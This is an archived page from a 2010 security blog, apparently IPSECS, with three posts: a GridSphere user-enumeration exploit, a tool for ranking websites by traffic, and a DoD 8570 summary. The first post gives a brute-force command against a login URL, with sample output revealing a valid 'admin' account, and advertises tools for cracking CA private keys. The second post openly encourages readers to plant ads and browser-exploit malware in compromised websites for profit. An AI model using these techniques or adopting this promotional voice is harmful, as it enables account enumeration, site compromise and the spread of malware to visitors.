Close Panel

20

Jun

2010

GridSphere Remote User Enumeration

By IPSECS Admin. Posted in Exploitation, News | No Comments »

GridSphere is web based portal framework to access grid computing resources. The GridSphere provides an open-source portlet based Web portal. GridSphere enables developers to quickly develop and package third-party portlet web applications that can be run and administered within the GridSphere portlet container.

GridSphere which is critically uses to access grid resource is found to be vulnerable that can be exploited to enumerate a user is valid or not in grid. This vulnerability exist due to the response of gridsphere in handling in-exist user with “User does not exist“. To exploit this issue, you can use this python script.

python gridsphere-brute.py https://example.com/acgt/portal?cid=login users.txt

[INVALID] anto
[INVALID] abc
[INVALID] betha
[INVALID] een
[INVALID] nita
[INVALID] aris
[INVALID] atik
[INVALID] babas
[INVALID] alex
[OK] admin
[INVALID] fuck
[INVALID] lisa
[INVALID] ifa
[INVALID] hana
[INVALID] bram

IPSECS has developed some tools to assess grid computing security years ago which can be download here. The tools is encoded in ASCII and bundled with article which explains grid computing [in]security written in indonesian. The tools provided can be used to:

  • Enumerate headnode by identifying GridFTP Service and Web Service Container
  • Crack private key in Certificate Authority
  • Exploit others headnode in grid when a headnode and its certificate compromised.

For your information, currently IPSECS is developing grid-toolkit to make grid computing penetration much more easier.

 

20

Jun

2010

How to Cheat The Ads for Profit!

By IPSECS Admin. Posted in SEO and Ads | No Comments »

Have you ever thought to put your ads in compromised website? Have you ever done to modify someone ads with your own? Putting your ads in someone website will not help increasing your revenue in low-traffic website.

Have you ever thought to insert malware in compromised website and exploit their clients? yeah browser vulnerability is the answer! Inserting in low-traffic website will not really help spreading your malware and compromise their clients!

Now, even this is old for us (IPSECS), we release tool to identify trafffic rank based on Alexa. This tool will help you to identify Alexa Rank on massive collected domains. By knowing the traffic rank of domains, this tool helps you to decide if website is worth or not if you put your ads on them. By knowing the traffic rank of domains, you can know if website is potential or not in boosting your revenue. Our simple tool need some perl module to be installed:

  • strict
  • warnings
  • Switch
  • POSIX
  • LWP::UserAgent
  • HTTP::Message

Lastly, you can download our tool to help indentifying traffic here. Cheat the ads for your profit, Boost your revenue now!

 

19

Jun

2010

DoD 8750 Directive

By IPSECS Admin. Posted in Management | No Comments »

The Department of Defense (DoD) is currently undergoing an organizational process involving Information Assurance (IA) standardization.

DoD 8570 seeks to accomplish the following objectives:

1. Create standards whereby IA Workfoce personnel, at all levels and fuctions, obtain a uniform level of competency with regard to DoD information and networks.
2. Establish a minimum skill level for all IA Workforce personnel throughout the DoD.
3. Provide qualified IA Workforce members to the soldiers that need them.
4. Creation of a set of formal training requirements and establishment of certification programs.
5. Add to the knowledge base of every IA Workforce team member through education or experience.

DoD 8750 document can be found here while DoD 8750 training and assessment can be reached at GIAC/DoD8750.

This article is ripped and modified from http://dod8570.net/